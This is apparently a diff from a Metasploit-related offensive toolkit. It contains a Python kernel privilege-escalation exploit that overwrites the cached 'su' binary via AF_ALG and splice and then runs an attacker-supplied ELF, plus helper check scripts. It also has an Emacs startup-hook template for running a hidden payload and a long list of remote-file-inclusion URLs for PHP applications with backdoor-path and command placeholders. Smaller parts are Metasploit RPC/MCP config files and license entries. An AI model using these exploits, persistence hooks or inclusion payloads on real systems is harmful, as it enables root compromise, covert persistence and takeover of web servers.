ruby-progressbar, 1.13.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
|
||||
ruby_smb, 3.3.15, "New BSD"
|
||||
ruby_smb, 3.3.17, "New BSD"
|
||||
rubyntlm, 0.6.5, MIT
|
||||
rubyzip, 2.4.1, "Simplified BSD"
|
||||
sawyer, 0.9.2, MIT
|
||||
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
|
||||
unix-crypt, 1.3.1, 0BSD
|
||||
useragent, 0.16.11, MIT
|
||||
warden, 1.2.9, MIT
|
||||
webmock, 3.26.2, MIT
|
||||
webrick, 1.9.1, "ruby, Simplified BSD"
|
||||
websocket-driver, 0.7.7, "Apache 2.0"
|
||||
websocket-extensions, 0.1.5, "Apache 2.0"
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
# Metasploit RPC API connection (MessagePack)
|
||||
msf_api:
|
||||
type: messagepack
|
||||
host: localhost
|
||||
port: 55553
|
||||
ssl: true
|
||||
endpoint: /api/
|
||||
user: msfuser
|
||||
password: CHANGEME
|
||||
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
|
||||
|
||||
# MCP server configuration
|
||||
mcp:
|
||||
transport: stdio # stdio (default) or http
|
||||
# MCP server network configuration (for HTTP transport only)
|
||||
host: localhost # Host to bind to (default: localhost)
|
||||
port: 3000 # Port to listen on (default: 3000)
|
||||
|
||||
# Rate limiting (optional - defaults shown)
|
||||
rate_limit:
|
||||
enabled: true
|
||||
requests_per_minute: 60
|
||||
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
|
||||
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
|
||||
# but then would be limited to 5 requests per minute thereafter.
|
||||
burst_size: 10
|
||||
|
||||
# Logging (optional - defaults shown)
|
||||
logging:
|
||||
enabled: false
|
||||
level: INFO # DEBUG, INFO, WARN, ERROR
|
||||
log_file: ~/.msf4/logs/msfmcp.log
|
||||
sanitize: true
|
||||
@@ -0,0 +1,32 @@
|
||||
# Metasploit RPC API connection (JSON-RPC)
|
||||
msf_api:
|
||||
type: json-rpc
|
||||
host: localhost
|
||||
port: 8081
|
||||
ssl: true
|
||||
endpoint: /api/v1/json-rpc
|
||||
token: YOUR_BEARER_TOKEN_HERE
|
||||
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
|
||||
|
||||
# MCP server configuration
|
||||
mcp:
|
||||
transport: stdio # stdio (default) or http
|
||||
# MCP server network configuration (for HTTP transport only)
|
||||
host: localhost # Host to bind to (default: localhost)
|
||||
port: 3000 # Port to listen on (default: 3000)
|
||||
|
||||
# Rate limiting (optional - defaults shown)
|
||||
rate_limit:
|
||||
enabled: true
|
||||
requests_per_minute: 60
|
||||
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
|
||||
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
|
||||
# but then would be limited to 5 requests per minute thereafter.
|
||||
burst_size: 10
|
||||
|
||||
# Logging (optional - defaults shown)
|
||||
logging:
|
||||
enabled: false
|
||||
level: INFO # DEBUG, INFO, WARN, ERROR
|
||||
log_file: ~/.msf4/logs/msfmcp.log
|
||||
sanitize: true
|
||||
@@ -0,0 +1,11 @@
|
||||
meterpreter
|
||||
▄▄▄▄ ▒█████ █████▒
|
||||
▓█████▄ ▒██▒ ██▒▓██ ▒
|
||||
▒██▒ ▄██▒██░ ██▒▒████ ░
|
||||
▒██░█▀ ▒██ ██░░▓█▒ ░
|
||||
░▓█ ▀█▓░ ████▓▒░░▒█░
|
||||
░▒▓███▀▒░ ▒░▒░▒░ ▒ ░
|
||||
▒░▒ ░ ░ ▒ ▒░ ░ ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
|
||||
░ ░ ░ ░ ░ ▒ ░ ░
|
||||
░ ░ ░ loader
|
||||
░
|
||||
File diff suppressed because one or more lines are too long
+33
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import socket
|
||||
import sys
|
||||
|
||||
AF_ALG = 38
|
||||
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
|
||||
|
||||
def check():
|
||||
if not os.path.exists('/proc/crypto'):
|
||||
print('[-] /proc/crypto is missing.')
|
||||
return
|
||||
|
||||
try:
|
||||
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
|
||||
except OSError as e:
|
||||
print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
|
||||
return
|
||||
|
||||
try:
|
||||
s.bind(("aead", ALG_NAME))
|
||||
except OSError as e:
|
||||
print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
|
||||
return
|
||||
finally:
|
||||
s.close()
|
||||
|
||||
print('[+] The exploit socket has been created, encryption primitives are available.')
|
||||
return True
|
||||
|
||||
if __name__ == '__main__':
|
||||
if not check():
|
||||
sys.exit(1)
|
||||
@@ -0,0 +1,9 @@
|
||||
import os
|
||||
import shutil
|
||||
|
||||
su_path = shutil.which('su')
|
||||
su_fd = os.open(su_path, os.O_RDONLY)
|
||||
try:
|
||||
os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
|
||||
finally:
|
||||
os.close(su_fd)
|
||||
+56
@@ -0,0 +1,56 @@
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import base64
|
||||
import shutil
|
||||
import socket
|
||||
import sys
|
||||
import zlib
|
||||
|
||||
AF_ALG = 38
|
||||
ALG_SET_KEY = 1
|
||||
ALG_SET_IV = 2
|
||||
ALG_SET_OP = 3
|
||||
ALG_SET_AEAD_ASSOCLEN = 4
|
||||
ALG_SET_AEAD_AUTHSIZE = 5
|
||||
SOL_ALG = 279
|
||||
|
||||
def setup_sock():
|
||||
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
|
||||
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
|
||||
sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
|
||||
sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
|
||||
op_sock, _ = sock.accept()
|
||||
return op_sock
|
||||
|
||||
def write(op_sock, su_fd, offset, chunk):
|
||||
op_sock.sendmsg(
|
||||
[b"A" * 4 + chunk],
|
||||
[
|
||||
(SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
|
||||
(SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
|
||||
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
|
||||
],
|
||||
32768
|
||||
)
|
||||
r, w = os.pipe()
|
||||
os.splice(su_fd, w, offset + 4, offset_src=0)
|
||||
os.splice(r, op_sock.fileno(), offset + 4)
|
||||
try:
|
||||
op_sock.recv(8 + offset)
|
||||
except:
|
||||
pass
|
||||
|
||||
su_path = shutil.which('su')
|
||||
su_fd = os.open(su_path, os.O_RDONLY)
|
||||
try:
|
||||
elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
|
||||
except:
|
||||
print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
|
||||
sys.exit(os.EX_USAGE)
|
||||
|
||||
op_sock = setup_sock()
|
||||
for i in range(0, len(elf), 4):
|
||||
write(op_sock, su_fd, i, elf[i:i + 4])
|
||||
op_sock.close()
|
||||
|
||||
os.execvp(su_path, ["su"] + sys.argv[1:])
|
||||
@@ -0,0 +1,15 @@
|
||||
(defun PLUGIN_NAME--process-sentinel (proc event)
|
||||
(when (memq (process-status proc) '(exit signal))
|
||||
(delete-process proc)))
|
||||
|
||||
(defun PLUGIN_NAME-run-async ()
|
||||
(make-process
|
||||
:name "PLUGIN_NAME"
|
||||
:buffer nil
|
||||
:command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
|
||||
:noquery t
|
||||
:sentinel #'PLUGIN_NAME--process-sentinel))
|
||||
|
||||
(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
|
||||
|
||||
(provide 'PLUGIN_NAME)
|
||||
+2247
-2246
@@ -1,2246 +1,2247 @@
|
||||
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
|
||||
# Change XXpathXX to the path of your backdoor. Note that you may need to
|
||||
# try it against every directory on the target and because of how this was
|
||||
# culled you may need to add a question mark to your own XXpathXX URL:
|
||||
# Eg: XXpathXX => http://www.example.com/hax.txt?
|
||||
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
|
||||
/123flashchat.php?e107path=XXpathXX
|
||||
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
|
||||
/22_ultimate/templates/header.php?mainpath=XXpathXX
|
||||
/22_ultimate/templates/header.php?mainpath=XXpathXX?
|
||||
/=XXpathXX
|
||||
/?_CONFIG[files][functions_page]=XXpathXX
|
||||
/?npage=-1&content_dir=XXpathXX%00&cmd=ls
|
||||
/?npage=1&content_dir=XXpathXX%00&cmd=ls
|
||||
/?show=XXpathXX?
|
||||
/A-Blog/navigation/donation.php?navigation_start=XXpathXX
|
||||
/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
|
||||
/A-Blog/navigation/links.php?navigation_start=XXpathXX?
|
||||
/A-Blog/navigation/search.php?navigation_end=XXpathXX?
|
||||
/A-Blog/sources/myaccount.php?open_box=XXpathXX?
|
||||
/ACGVnews/header.php?PathNews=XXpathXX
|
||||
/ATutor/documentation/common/frame_toc.php?section=XXpathXX
|
||||
/ATutor/documentation/common/search.php?section=XXpathXX
|
||||
/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
|
||||
/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
|
||||
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
|
||||
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
|
||||
/Administration/Includes/configureText.php?path_prefix=XXpathXX
|
||||
/Administration/Includes/contentHome.php?path_prefix=XXpathXX
|
||||
/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
|
||||
/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
|
||||
/Administration/Includes/userHome.php?path_prefix=XXpathXX
|
||||
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
|
||||
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
|
||||
/BE_config.php?_PSL[classdir]=XXpathXX
|
||||
/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
|
||||
/Base/Application.php?pear_dir=XXpathXX
|
||||
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
|
||||
/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
|
||||
/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
|
||||
/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
|
||||
/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
|
||||
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
|
||||
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
|
||||
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
|
||||
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
|
||||
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
|
||||
/CheckUpload.php?Language=XXpathXX&cmd=ls
|
||||
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
|
||||
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
|
||||
/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
|
||||
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
|
||||
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
|
||||
/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
|
||||
/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
|
||||
/DynaTracker_v151/action.php?base_path=XXpathXX
|
||||
/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
|
||||
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
|
||||
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
|
||||
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
|
||||
/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
|
||||
/FirstPost/block.php?Include=XXpathXX
|
||||
/Flickrclient.php?path_prefix=XXpathXX
|
||||
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
|
||||
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
|
||||
/Full_Release/include/body_comm.inc.php?content=XXpathXX
|
||||
/Gallery/displayCategory.php?basepath=XXpathXX
|
||||
/Include/lib.inc.php3?Include=XXpathXX?
|
||||
/Include/variables.php3?Include=XXpathXX?
|
||||
/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
|
||||
/ListRecords.php?lib_dir=XXpathXX?&cmd=id
|
||||
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
|
||||
/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
|
||||
/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
|
||||
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
|
||||
/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
|
||||
/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
|
||||
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
|
||||
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
|
||||
/PHP/includes/header.inc.php?root=XXpathXX?
|
||||
/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
|
||||
/PaTh/index.php?rootpath=XXpathXX
|
||||
/Path_Script/createurl.php?formurl=XXpathXX
|
||||
/PhotoCart/adminprint.php?admin_folder=XXpathXX
|
||||
/Picssolution/install/config.php?path=XXpathXX?
|
||||
/RGboard/include/footer.php?_path[counter]=XXpathXX?
|
||||
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
|
||||
/SQuery/lib/gore.php?libpath=XXpathXX
|
||||
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
|
||||
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
|
||||
/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
|
||||
/ScriptPath/footers.php?tinybb_footers=XXpathXX
|
||||
/ScriptPath/index.php?page=XXpathXX
|
||||
/Script_Path/config.inc.php?_path=XXpathXX?
|
||||
/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
|
||||
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
|
||||
/Somery/team.php?checkauth=XXpathXX
|
||||
/Upload/install.php?skindir=XXpathXX
|
||||
/Widgets/Base/Footer.php?sys_dir=XXpathXX
|
||||
/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
|
||||
/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
|
||||
/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
|
||||
/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
|
||||
/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
|
||||
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
|
||||
/[path]/mybic_server.php?file=XXpathXX
|
||||
/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
|
||||
/_administration/securite.php?cfg[document_uri]=XXpathXX
|
||||
/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
|
||||
/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
|
||||
/_connect.php?root=XXpathXX
|
||||
/_friendly/core/data/_load.php?friendly_path=XXpathXX
|
||||
/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
|
||||
/_friendly/core/display/_load.php?friendly_path=XXpathXX
|
||||
/_friendly/core/support/_load.php?friendly_path=XXpathXX
|
||||
/_functions.php?prefix=XXpathXX
|
||||
/_includes/settings.inc.php?approot=XXpathXX
|
||||
/_theme/breadcrumb.php?rootBase=XXpathXX
|
||||
/_wk/wk_lang.php?WK[wkPath]=XXpathXX
|
||||
/abf_js.php?abs_pfad=XXpathXX?&cmd=id
|
||||
/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/about.php?bibtexrootrel=XXpathXX?
|
||||
/aboutinfo.php?bibtexrootrel=XXpathXX?
|
||||
/acc.php?page=XXpathXX
|
||||
/access/login.php?path_to_root=XXpathXX
|
||||
/account.php?insPath=XXpathXX
|
||||
/accsess/login.php?path_to_root=XXpathXX
|
||||
/active/components/xmlrpc/client.php?c[components]=XXpathXX
|
||||
/ad_main.php?_mygamefile=XXpathXX
|
||||
/add.cgi.php?blog_theme=XXpathXX
|
||||
/add_link.php?blog_theme=XXpathXX
|
||||
/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
|
||||
/addressbook.php?GLOBALS[basedir]=XXpathXX?
|
||||
/addsite.php?returnpath=XXpathXX
|
||||
/addvip.php?msetstr["PROGSDIR"]=XXpathXX
|
||||
/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
|
||||
/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
|
||||
/admin.loudmouth.php?mainframe=XXpathXX
|
||||
/admin.php?Madoa=XXpathXX?
|
||||
/admin.php?cal_dir=XXpathXX
|
||||
/admin.php?env_dir=XXpathXX
|
||||
/admin.php?lang=XXpathXX
|
||||
/admin.php?page[path]=XXpathXX?&cmd=ls
|
||||
/admin.php?submit=submit&form_include_template=XXpathXX
|
||||
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
|
||||
/admin/ST_countries.php?include_path=XXpathXX?
|
||||
/admin/ST_platforms.php?include_path=XXpathXX?
|
||||
/admin/addentry.php?phpbb_root_path=XXpathXX?
|
||||
/admin/addons/archive/archive.php?adminfolder=XXpathXX
|
||||
/admin/admin.php?path=XXpathXX
|
||||
/admin/admin.php?site_url=XXpathXX
|
||||
/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
|
||||
/admin/admin_news_bot.php?root_path=XXpathXX?
|
||||
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
|
||||
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
|
||||
/admin/admin_users.php?phpbb_root_path=XXpathXX
|
||||
/admin/auth.php?xcart_dir=XXpathXX?
|
||||
/admin/auth/secure.php?cfgProgDir=XXpathXX?
|
||||
/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
|
||||
/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
|
||||
/admin/catagory.php?language=XXpathXX
|
||||
/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
|
||||
/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
|
||||
/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
|
||||
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
|
||||
/admin/code/index.php?load_page=XXpathXX
|
||||
/admin/comment.php?config[installdir]=XXpathXX
|
||||
/admin/common-menu.php?CONF[local_path]=XXpathXX
|
||||
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
|
||||
/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
|
||||
/admin/directory.php?config[installdir]=XXpathXX
|
||||
/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
|
||||
/admin/frontpage_right.php?loadadminpage=XXpathXX
|
||||
/admin/header.php?loc=XXpathXX
|
||||
/admin/inc/add.php?format_menue=XXpathXX
|
||||
/admin/inc/change_action.php?format_menue=XXpathXX
|
||||
/admin/include/common.php?commonIncludePath=XXpathXX?
|
||||
/admin/include/header.php?repertoire=XXpathXX?
|
||||
/admin/include/lib.module.php?mod_root=XXpathXX
|
||||
/admin/includes/admin_header.php?level=XXpathXX?
|
||||
/admin/includes/author_panel_header.php?level=XXpathXX?
|
||||
/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
|
||||
/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
|
||||
/admin/index.php?path_to_script=XXpathXX?&cmd=ls
|
||||
/admin/index.php?pg=XXpathXX?
|
||||
/admin/index.php?xtrphome=XXpathXX
|
||||
/admin/index_sitios.php?_VIEW=XXpathXX
|
||||
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
|
